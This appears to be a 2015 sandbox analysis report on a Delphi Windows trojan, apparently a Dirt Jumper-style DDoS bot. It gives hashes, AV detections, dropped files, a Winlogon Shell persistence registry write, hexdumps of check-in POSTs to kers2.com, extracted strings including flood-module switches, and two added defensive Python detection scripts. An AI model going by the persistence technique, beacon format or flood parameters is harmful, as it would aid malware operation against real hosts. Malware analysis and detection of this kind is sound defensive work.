Analysis Date: 2015-12-14 20:17:57
MD5: 8314c44ebbe0a61a96d79f7f87bab599
SHA1: 46ff40039452a32bad85906c7446ca68f7fda8d9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: (not reported)  sha1: (not reported)  size: (not reported)
Section .data   md5: 93b82342b4b07d71dcaeaa2467d0abd1  sha1: 6f39d22918114d7ca3c3ae3dfea8c187e0778259  size: 2048
Section .xcpad  md5: (not reported)  sha1: (not reported)  size: (not reported)
Section .idata  md5: 93b82342b4b07d71dcaeaa2467d0abd1  sha1: 6f39d22918114d7ca3c3ae3dfea8c187e0778259  size: 2048
Section .reloc  md5: c100bfc797e9d044af80a73c0f5b95c7  sha1: 74a9686f474f4d8ac5c9dfbd39c2ace66a87d317  size: 2048
Section .rsrc   md5: 063e83ccc2a443299ee1a9f10af1fd9f  sha1: fe63c0de82c9d82564f327876efb1c8ac71985d2  size: 512
Note: the .text section has no hash or size at all, and .data and .idata report identical md5/sha1 and the same 2048-byte size, which normally means the tool hashed the same raw bytes twice. Re-parse the section table with an independent PE parser before using any of these section hashes as indicators; the file-level MD5/SHA1 and the IMPhash below are the reliable static identifiers on this page.
Timestamp: (not reported)
Version info: LegalCopyright, InternalName, FileVersion, CompanyName, Comments, ProductName, ProductVersion, FileDescription, OriginalFilename, Packager, PackagerVersion: all empty (no version strings were extracted)
Packer: (none reported)
PEhash: (not reported)
IMPhash: 2db53d48dd1f35054e31bffab1f4f814
AV results (21 of the 30 engines flag the file; names are the vendors' own, "no_virus" is the tool's value for no detection):
Ad-Aware: Gen:Variant.Barys.20804
Alwil (avast): Virtu-F:Win32:Virtu-F
Arcabit (arcavir): Gen:Variant.Barys.20804
Authentium: no_virus
Avira (antivir): TR/Crypt.XPACK.Gen
BitDefender: Gen:Variant.Barys.20804
BullGuard: Gen:Variant.Barys.20804
CA (E-Trust Ino): no_virus
CAT (quickheal): no_virus
ClamAV: Win.Trojan.Delf-18937
Dr. Web: Trojan.PWS.Tibia.2410
Emsisoft: Gen:Variant.Barys.20804
Eset (nod32): Win32/Spy.Delf.PKE
F-Secure: Gen:Variant.Barys.20804
Fortinet: W32/Delf.PHQ!tr
Frisk (f-prot): no_virus
Grisoft (avg): Win32/DH{ggZn?}
Ikarus: Backdoor.Win32.HacDef
K7: no_virus
Kaspersky: Trojan.Win32.Generic
MalwareBytes: Trojan.Injector.DF
Mcafee: no_virus
MicroWorld (escan): Gen:Variant.Barys.20804
Microsoft Security Essentials: Trojan:Win32/Dishigy.J
Rising: no_virus
Symantec: Trojan.Dirtjump
Trend Micro: no_virus
Twister: Trojan.F7D5E87662F0704D
VirusBlokAda (vba32): no_virus
Zillya!: Trojan.Delf.Win32.60047

Runtime Details:

Screenshot

Process
↳ C:\46ff40039452a32bad85906c7446ca68f7fda8d9.exe

Creates File: C:\Windows\resources\themes\Aero\Shell\NormalColor\ShellStyle.dll
Creates File: C:\
Creates File: C:\46ff40039452a32bad85906c7446ca68f7fda8d9.exe
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
Creates File: C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db
Creates File: C:\desktop.ini
Creates File: C:\Windows\serwos.exe
Creates File: C:\ProgramData\systemskey.ini (logged three times)
Creates File: Nsi (most likely the Winsock NSI device opened during WSAStartup, not a file on disk)
Creates Mutex: (name not reported)
Note: the two artefacts that matter for triage are C:\Windows\serwos.exe, the copy that the registry write below registers as a Winlogon shell, and C:\ProgramData\systemskey.ini, which the sample writes repeatedly. The theme DLL, cache database and desktop.ini entries are consistent with side effects of the shell32 calls the sample imports (SHFileOperationA, SHGetSpecialFolderPathA) rather than deliberate drops.
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe, serwos.exe\\x00 (the identical write was logged 14 times)
Note: appending serwos.exe to the Winlogon Shell value makes Winlogon launch the dropped C:\Windows\serwos.exe alongside explorer.exe at every interactive logon (MITRE ATT&CK T1547.004). The Wow6432Node path shows that the sandbox ran this 32-bit sample on 64-bit Windows, so the write was redirected into the 32-bit registry view; the 64-bit winlogon.exe consults the native key, so when triaging a 64-bit host read both HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell and the Wow6432Node copy and confirm which one actually took effect. On 32-bit Windows there is no redirection and the value lands directly in the native key.
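A check a responder would run on a suspected host, added here as an example and not part of the sandbox report: it parses a Winlogon Shell value such as the one logged above and returns every entry that is not explorer.exe, and on Windows it reads both registry views. The REPORTED_VALUE string is copied from the log; treating only explorer.exe as legitimate is my assumption, not something the report states.

```python
# Added example: inspect a Winlogon "Shell" value for extra shell programs.
# Not code from the report; REPORTED_VALUE is the value the sandbox logged,
# and the explorer.exe-only allow-list is an assumption of this example.
import sys

DEFAULT_SHELL = "explorer.exe"
WINLOGON_KEY = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
REPORTED_VALUE = "explorer.exe, serwos.exe\\x00"   # as written in the sandbox log


def parse_shell_value(raw: str) -> list[str]:
    """Split a Shell value into its comma-separated program entries.
    The sandbox log renders the terminating NUL as the text '\\x00'; a REG_SZ
    read through winreg may carry an actual NUL, so both are stripped."""
    cleaned = raw.replace("\\x00", "").replace("\x00", "")
    return [e.strip() for e in cleaned.split(",") if e.strip()]


def suspicious_shell_entries(raw: str) -> list[str]:
    """Every entry that is not the stock explorer.exe (case-insensitive)."""
    return [e for e in parse_shell_value(raw) if e.lower() != DEFAULT_SHELL]


def check_live_registry() -> dict[str, list[str]]:
    """On Windows, read the Shell value from both registry views: a 32-bit
    process on 64-bit Windows (the Wow6432Node path in the log) writes the
    32-bit view, so a check of the native view alone can miss the entry.
    Returns {view: suspicious entries}; on other platforms returns {} so the
    module still imports and the offline checks above still run."""
    if sys.platform != "win32":
        return {}
    import winreg
    views = {"native": winreg.KEY_WOW64_64KEY, "Wow6432Node": winreg.KEY_WOW64_32KEY}
    results = {}
    for name, flag in views.items():
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, WINLOGON_KEY, 0,
                                winreg.KEY_READ | flag) as key:
                value, _ = winreg.QueryValueEx(key, "Shell")
        except OSError:
            continue
        results[name] = suspicious_shell_entries(str(value))
    return results


if __name__ == "__main__":
    print("from sandbox log:", suspicious_shell_entries(REPORTED_VALUE))
    print("this host:", check_live_registry())
```

Anything returned for either view is worth pulling and hashing; a clean host returns an empty list for both.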

Network Details:


Raw Pcap (two check-in POSTs to kers2.com; both carry the same 17-byte body k=el94xh30yv1lkmw and the same Russian-locale Accept-Language header, but each request uses a different spoofed browser User-Agent, matching the User-Agent templates in the Strings section)
0x00000000 (00000)   504f5354 202f6e65 772f2048 5454502f   POST /new/ HTTP/
0x00000010 (00016)   312e310d 0a486f73 743a206b 65727332   1.1..Host: kers2
0x00000020 (00032)   2e636f6d 0d0a5573 65722d41 67656e74   .com..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f352e 30202857   : Mozilla/5.0 (W
0x00000040 (00064)   696e646f 7773204e 5420352e 313b2072   indows NT 5.1; r
0x00000050 (00080)   763a3133 2e302920 4765636b 6f2f3230   v:13.0) Gecko/20
0x00000060 (00096)   31303031 30312046 69726566 6f782f31   100101 Firefox/1
0x00000070 (00112)   332e300d 0a416363 6570743a 202a2f2a   3.0..Accept: */*
0x00000080 (00128)   3b713d30 2e310d0a 41636365 70742d45   ;q=0.1..Accept-E
0x00000090 (00144)   6e636f64 696e673a 20677a69 702c6465   ncoding: gzip,de
0x000000a0 (00160)   666c6174 650d0a41 63636570 742d4c61   flate..Accept-La
0x000000b0 (00176)   6e677561 67653a20 72752d52 552c7275   nguage: ru-RU,ru
0x000000c0 (00192)   3b713d30 2e382c65 6e2d5553 3b713d30   ;q=0.8,en-US;q=0
0x000000d0 (00208)   2e352c65 6e3b713d 302e330d 0a436f6e   .5,en;q=0.3..Con
0x000000e0 (00224)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000f0 (00240)   6976650d 0a436f6e 74656e74 2d4c656e   ive..Content-Len
0x00000100 (00256)   6774683a 2031370d 0a436f6e 74656e74   gth: 17..Content
0x00000110 (00272)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000120 (00288)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000130 (00304)   6c656e63 6f646564 0d0a0d0a 6b3d656c   lencoded....k=el
0x00000140 (00320)   39347868 33307976 316c6b6d 77         94xh30yv1lkmw

0x00000000 (00000)   504f5354 202f6e65 772f2048 5454502f   POST /new/ HTTP/
0x00000010 (00016)   312e310d 0a486f73 743a206b 65727332   1.1..Host: kers2
0x00000020 (00032)   2e636f6d 0d0a5573 65722d41 67656e74   .com..User-Agent
0x00000030 (00048)   3a204f70 6572612f 392e3830 20285769   : Opera/9.80 (Wi
0x00000040 (00064)   6e646f77 73204e54 20362e31 3b20574f   ndows NT 6.1; WO
0x00000050 (00080)   5736343b 20553b20 45646974 696f6e20   W64; U; Edition 
0x00000060 (00096)   556e6974 6564204b 696e6764 6f6d204c   United Kingdom L
0x00000070 (00112)   6f63616c 3b207275 29205072 6573746f   ocal; ru) Presto
0x00000080 (00128)   2f322e31 302e3238 39205665 7273696f   /2.10.289 Versio
0x00000090 (00144)   6e2f372e 30350d0a 41636365 70743a20   n/7.05..Accept: 
0x000000a0 (00160)   2a2f2a3b 713d302e 310d0a41 63636570   */*;q=0.1..Accep
0x000000b0 (00176)   742d456e 636f6469 6e673a20 677a6970   t-Encoding: gzip
0x000000c0 (00192)   2c646566 6c617465 0d0a4163 63657074   ,deflate..Accept
0x000000d0 (00208)   2d4c616e 67756167 653a2072 752d5255   -Language: ru-RU
0x000000e0 (00224)   2c72753b 713d302e 382c656e 2d55533b   ,ru;q=0.8,en-US;
0x000000f0 (00240)   713d302e 352c656e 3b713d30 2e330d0a   q=0.5,en;q=0.3..
0x00000100 (00256)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x00000110 (00272)   2d416c69 76650d0a 436f6e74 656e742d   -Alive..Content-
0x00000120 (00288)   4c656e67 74683a20 31370d0a 436f6e74   Length: 17..Cont
0x00000130 (00304)   656e742d 54797065 3a206170 706c6963   ent-Type: applic
0x00000140 (00320)   6174696f 6e2f782d 7777772d 666f726d   ation/x-www-form
0x00000150 (00336)   2d75726c 656e636f 6465640d 0a0d0a6b   -urlencoded....k
0x00000160 (00352)   3d656c39 34786833 30797631 6c6b6d77   =el94xh30yv1lkmw
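The capture above, decoded and checked with an added example (mine, not code from the report or from the sample): it rebuilds the bytes from the hexdump lines, parses the HTTP request, and reports which traits match the observed check-in. The hexdump embedded in the block is the first capture copied from above; the four beacon traits and the 15-character token length are thresholds I derived from this one capture, not a documented protocol.

```python
# Added example: decode the report's raw pcap hexdump, parse the request and
# flag the traits of the observed check-in.  Not code from the report or the
# sample; HEXDUMP is the first capture above, copied verbatim.
import re
from dataclasses import dataclass, field

HEXDUMP = """\
0x00000000 (00000)   504f5354 202f6e65 772f2048 5454502f   POST /new/ HTTP/
0x00000010 (00016)   312e310d 0a486f73 743a206b 65727332   1.1..Host: kers2
0x00000020 (00032)   2e636f6d 0d0a5573 65722d41 67656e74   .com..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f352e 30202857   : Mozilla/5.0 (W
0x00000040 (00064)   696e646f 7773204e 5420352e 313b2072   indows NT 5.1; r
0x00000050 (00080)   763a3133 2e302920 4765636b 6f2f3230   v:13.0) Gecko/20
0x00000060 (00096)   31303031 30312046 69726566 6f782f31   100101 Firefox/1
0x00000070 (00112)   332e300d 0a416363 6570743a 202a2f2a   3.0..Accept: */*
0x00000080 (00128)   3b713d30 2e310d0a 41636365 70742d45   ;q=0.1..Accept-E
0x00000090 (00144)   6e636f64 696e673a 20677a69 702c6465   ncoding: gzip,de
0x000000a0 (00160)   666c6174 650d0a41 63636570 742d4c61   flate..Accept-La
0x000000b0 (00176)   6e677561 67653a20 72752d52 552c7275   nguage: ru-RU,ru
0x000000c0 (00192)   3b713d30 2e382c65 6e2d5553 3b713d30   ;q=0.8,en-US;q=0
0x000000d0 (00208)   2e352c65 6e3b713d 302e330d 0a436f6e   .5,en;q=0.3..Con
0x000000e0 (00224)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000000f0 (00240)   6976650d 0a436f6e 74656e74 2d4c656e   ive..Content-Len
0x00000100 (00256)   6774683a 2031370d 0a436f6e 74656e74   gth: 17..Content
0x00000110 (00272)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000120 (00288)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000130 (00304)   6c656e63 6f646564 0d0a0d0a 6b3d656c   lencoded....k=el
0x00000140 (00320)   39347868 33307976 316c6b6d 77         94xh30yv1lkmw
"""

# "<offset> (<decimal>)   <hex groups>   <ascii>": hex groups are separated by
# single spaces, the ASCII column by a run of spaces, so the first run of two
# or more spaces ends the hex column (ASCII text such as "94xh30" is not hex).
_LINE = re.compile(r"^0x[0-9a-fA-F]+\s+\(\d+\)\s+")


def decode_hexdump(text: str) -> bytes:
    """Rebuild the packet payload; lines that are not hexdump rows are skipped."""
    out = bytearray()
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        hex_col = re.split(r"\s{2,}", line[m.end():].strip())[0]
        out += bytes.fromhex(hex_col.replace(" ", ""))
    return bytes(out)


@dataclass
class HttpRequest:
    method: str
    path: str
    version: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def parse_http_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request parser: lower-cased header names, body cut at
    Content-Length so trailing capture bytes are not mistaken for payload."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    n = int(headers.get("content-length", len(body)))
    return HttpRequest(method, path, version, headers, body[:n])


_TOKEN = re.compile(rb"^k=[a-z0-9]{15}$")   # body shape seen in both captures


def beacon_indicators(req: HttpRequest) -> list[str]:
    """Traits of this request that match the observed check-in (assumed
    thresholds derived from the two captures, not a documented protocol)."""
    hits = []
    if req.headers.get("host") == "kers2.com":
        hits.append("host kers2.com")
    if req.method == "POST" and req.path == "/new/":
        hits.append("POST /new/")
    if req.headers.get("accept") == "*/*;q=0.1":
        hits.append("unusual Accept header")
    if (req.headers.get("content-type") == "application/x-www-form-urlencoded"
            and _TOKEN.match(req.body)):
        hits.append("single 15-char k= token body")
    return hits


if __name__ == "__main__":
    req = parse_http_request(decode_hexdump(HEXDUMP))
    print(req.headers["user-agent"])
    print(beacon_indicators(req))
```

The Host match is the only indicator tied to this sample's infrastructure; the other three describe the request shape and will keep matching if the operator moves the domain, so a proxy-log hunt should weight them together rather than rely on the Host alone.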


Strings
(Analyst notes on the list below. The SOFTWARE\Borland\Delphi\RTL key, the TObject/TRegistry class names and the recurring ZYYd byte sequence, which is Delphi's try/finally epilogue (pop edx; pop ecx; pop ecx; then the fs: prefix of the frame restore), identify a Delphi build and match the Delf family names in the AV column. The Software / Microsoft / Windows NT / CurrentVersion / Winlogon / Shell / "explorer.exe," fragments are the pieces of the persistence write recorded above. The User-Agent templates, the "; WOW64" fragment and the country list are the parts assembled into the randomised browser headers seen in the two captures. The switch-like strings -get, -post1, -post2, -ip, -ip2, -request, -timeout and -thread, together with the login=[1000]&pass=[1000]&... form template, read like the arguments of an HTTP GET/POST flood module, consistent with the Dirtjump detection (Dirt Jumper is an HTTP-flood DDoS family) and the Dishigy name; the only traffic captured here is the check-in to kers2.com. Strings such as gui,vkyoiq, kkm,|ampqcwo{p and olg,5otbo appear encoded and are not decoded here. The short mnemonics such as SVWU and ]_^[ are push/pop prologue bytes, and the lines of the form 0,080<0@0D0... are relocation-table entries, not text.)
StringX
TObject
u:hD
SVWUQ
Z]_^[
SVWU
YZ]_^[
SVWU
]_^[
SVWU
w;;t$
]_^[
SVWU
]_^[
SVWUQ
Z]_^[
SVWU
YZ]_^[
SVWU
uW;{
u:;{
]_^[
ZYYd
ZYYd
SVWU
]_^[
YZ^[
SVWU
]_^[
ZYYd
_^[YY]
QSVW
UhN"@
ZYYd
hU"@
_^[Y]
SVWU
$;L$
$)D$
YZ]_^[
QSVW
ZYYd
_^[Y]
YZXu
SVWU
C<"u1S
Q<"u8S
7CF;
7CF;
]_^[
Ht Ht.
r/f=
w)f%
SVWQ
SVWR
	w%9
~KxI[)
2_^[
YZXt5
YX_^

hd1@
Uh=1@
ZYYd
hD1@
SOFTWARE\Borland\Delphi\RTL
FPUMaskValue
PPRTj
YYZX
YZXtp
VWUd
SPRQ
T$(j
SVWU
]_^[
]_^[
d$,1
,t\=
t=HtN
r6t0
t.Ht
Ph*7@
ZYYd
_^[]
Uhr8@
ZYYd
_^[]
SVWU
]_^[
;_^[
t!R:
SVWRP
Z_^[X
uXJt
uAJt
u:Jt
It2S
t&J|
N|*9
t1SVW
;_^[
PSVW
_^[X
_^[X
ZYYd
_^[YY]
ZYYd
Uh&C@
ZYYd
h-C@
Uh~C@
ZYYd
ZYYd
ZYYd
ZYYd
UhIG@
ZYYd
hPG@
| C3
	TRegistry
TCommand0
h8J@
ZYYd
h$J@
QSVW
_^[Y]
QZ^&
QSVW
_^[Y]
SVW3
ZYYd
ZYYd
^[YY]
QQQQQQSVW
UhaY@
ZYYd
hhY@
ZYYd
^[Y]
ZYYd
ZYYd
SVW3
ZYYd
ZYYd
gui,vkyoiq
Software
Microsoft
Windows NT
CurrentVersion
Winlogon
explorer.exe,
Shell
QQQQQQQSVW3
UhO`@
h|`@
Uh*`@
ZYYd
ZYYd
hV`@
gui,vkyoiq
hh_@
; WOW64
Bangladesh
Russia
United Kingdom
Egypt
China
Iran
Mongolia
India
Grenada
Thailand
Romania
Germany
France
Ukraine
United States
ZYYd
ZYYd
_^[YY]
QQQQQSVW
Uhce@
Uh>e@
ZYYd
ZYYd
hje@
.com
.net
.org
http://
h0h@
h<h@
hLh@
hph@
h|h@
h0h@
hph@
h0h@
hHi@
h`i@
ZYYd
Mozilla/5.0 (Windows NT
; rv:
.0) Gecko/20100101 Firefox/
Opera/9.80 (Windows NT
; U; Edition
 Local; ru) Presto/2.10.289 Version/
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT
; Trident/4.0; SLCC2; .NET CLR 2.0.
; .NET CLR 3.5.
; .NET CLR 3.0.
h\n@
hpn@
h|n@
hTo@
hto@
ZYYd
https://
http://
error1
error2
error3 (
 HTTP/1.1
Host:
User-Agent:
Accept: */*;q=0.1
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer:
POST
Content-Length:
Content-Type: application/x-www-form-urlencoded
error4 (Send)
ZYYd
ZYYd
SVWU
]_^[
SVWU
]_^[
QSVW
_^[Y]
Sh|t@
_^[]
QQQQQSVW
UhMy@
ZYYd
ZYYd
hTy@
SVW3
ZYYd
UhV{@
ZYYd
ZYYd
kkm,|ampqcwo{p
QSVW3
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
olg,5otbo
1til2
3C6?:?H@85;?H@F4;@46:6<,4.=2:@H2
"7xqrD
<qrcj=/oiqX
POST
200 OK
-get
-post1
-post2
-ip
-ip2
-request
login=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]
-timeout
-thread
https://
http://
POST
 HTTP/1.1
Host:
User-Agent:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Connection: Keep-Alive
Referer: http://
Content-Length:
Content-Type: application/x-www-form-urlencoded
GET
Referer:
ZYYd
ZYYd
Error
Runtime error     at 00000000
0123456789ABCDEF
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
GetThreadLocale
GetStartupInfoA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegSetValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
OpenThreadToken
OpenProcessToken
GetTokenInformation
FreeSid
EqualSid
AllocateAndInitializeSid
kernel32.dll
Sleep
MoveFileA
GetLastError
GetCurrentThread
GetCurrentProcess
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
ExitThread
CreateThread
CloseHandle
wsock32.dll
WSAStartup
gethostbyname
socket
shutdown
setsockopt
send
recv
inet_addr
htons
connect
closesocket
shell32.dll
SHFileOperationA
SHGetSpecialFolderPathA
0,080<0@0D0H0L0P0T0b0j0r0z0
1"1*121:1B1J1v1~1
1H2O2
4,5p5
7*8G8R8]8e8o8y8
9%9-989>9K9Q9k9r9|9
:+:J:b:j:
;/;M;w<
=!>?>D>J>
?#?9?_?k?s?
0-050;0D0K0P0V0i0r0
1#121B1b1z1
2&262<2D2
2-343D3N3T3\3b3h3o3y3 4I4g4s4{4
5'5O5h5
8'9P9W9^9.:C:v:
:(;/;
<-<6<=?E?N?
1/1F1[1
2V3j3r3
4(4;4k4
7&7>7`7
738F8Z8
9,969[9e9o9w9}9
1*212C2a2j2v2}2
3;3G3N3X3b3y3
3&4;4L4V4^4f4n4v4
5&52575<5C5J5T5k5w5
6&6.666>6F6N6V6^6f6n6v6~6
7+777D7V7
7D8P8d8l8p8t8x8|8
8D8G9r9
:7:O:
=6=Y=
>#>1>?>Q>^>
1!1%1)1-1115191=1A1E1I1M1Q1U1\1j1x1
2 2J3X3
4%4E4I4M4Q4U4Y4x4
5$5Q5
7'777G7d7
:6:Z:
: ;8;Q;j;o;w;|;
<9<k<|<
I0s0
0)1D1
818W8q8
:4:<:K:\:h:
:_;v;
<!<\<r<w<
=!='=8=L=X=|=
>6>N>f>
?.?G?k?
0?1]1|1
2!2.2?2V2z2
3,3@3\3l3
434g4
435D5Y5
6W6p6
7'7E7Y7
7+8F8z8
8+9Q9
:1:6:;:O:T:Y:o:t:y:~:
: ;<;H;\;a;f;z;
=0=F=[={=
2"2-2?2T2X2\2`2d2h2l2p2t2x2|2
004080
&=O8
cdcdfd
UTypes
System
SysInit
WinSock
KWindows